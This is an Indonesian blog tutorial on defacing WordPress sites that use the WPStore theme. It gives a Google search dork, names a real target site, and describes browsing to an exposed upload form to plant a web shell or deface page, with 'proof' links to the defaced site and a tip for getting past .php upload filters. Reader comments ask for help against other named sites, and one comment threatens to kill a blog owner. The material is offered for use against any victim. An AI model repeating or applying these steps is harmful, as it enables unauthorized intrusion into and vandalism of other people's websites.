WordPress merupakan web yang memiliki tingkat keamanan cukup ketat, hal ini karena belum ditemukanya hash yang dapat mendecode password wordpress. Jika kita melakukan sql injection pun pasti akan mentok cuma sampai nemuin user sama password wordpress yang masih berbentuk hash, tapi kita tetap bisa mendeface/menanam shell pada wordpress. Ko bisa? Ciyuss? Wah yang baca alay nih😀 Ya bisa dong, mau tau kan? hehe.. Okeh langsung aja kita mulai deh tutornya daripada nanti saya ikutan alay, Peace😀

Salah satu cara yang bisa kita lakukan adalah dengan mencari bug upload page pada wordpress..

Dorknya : inurl:/wp-content/themes/WPstore/ (kreasi lagi ya :-))

Langkah1
Search dorknya di google dan cari targetnya,yg mana aja,contoh kita ambil target ini
http://beauty.nooblue.com

Langkah2
setelah masuk nanti di url akan seperti ini target.com/produse/wp-content/themes/WPStore/library/includes/cordless-home-phones.php

POC:http://beauty.nooblue.com/wp-content/themes/WPStore/q11.swf

lalu ubah menjadi kaya gini target.com/produse/wp-content/themes/WPStore/upload ,lalu tekan enter.

POC:http://beauty.nooblue.com/wp-content/themes/WPStore/upload/

Langkah3
abis itu nanti muncul form buat upload,nah disini kita bakalan upload file deface/shell kita masing2,so upload deh

kalo udah berarti kita berhasil mendeface/nanem shell kita di web tsb wakaka lanjoot!

Langkah4
kalo udah berhasil deface/nanem shell,sekarang kita ke tempat dimana kita upload shell kita tadi,url nya kaya gini target.com/produse/wp-content/uploads/products_img/shell.php/deface.html

taraa kita udah masuk😀

POC:http://beauty.nooblue.com/wp-content/uploads/products_img/index.html (index.html itu nama file deface saya jadi gak usah bingung yah)

Okeh deh, kalo kita gak bisa upload shell dengan format .php kita bisa mengatasinya dengan melakukan tamper data, caranya udah ada di blog ini, Okeh sekian dulu yah tutor kali ini, Keep Trying OK🙂

sumber

Comments
  1. adiezelf says:

    kak, kalo formatnya beda gmna
    http://gaemgyuchokyuhyun.wordpress.com/ ini target qh. qh bener2 pingin bunuh yg punya kak. tolong ya…. ajarin. inbox qh di FB xlo kakak mau bantu Alfi Adistya.

  2. rema says:

    kalo ni gan? ni pake wordpress lho tp g bisa..http://www.smpn2blora.sch.id/?cat=1

  3. LOIC-ddos says:

    gan kok ga aga button uploadnya, gmn sih kita tau bahwa upload kita sukses?

Silakan Komentar Jika Kurang Jelas

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s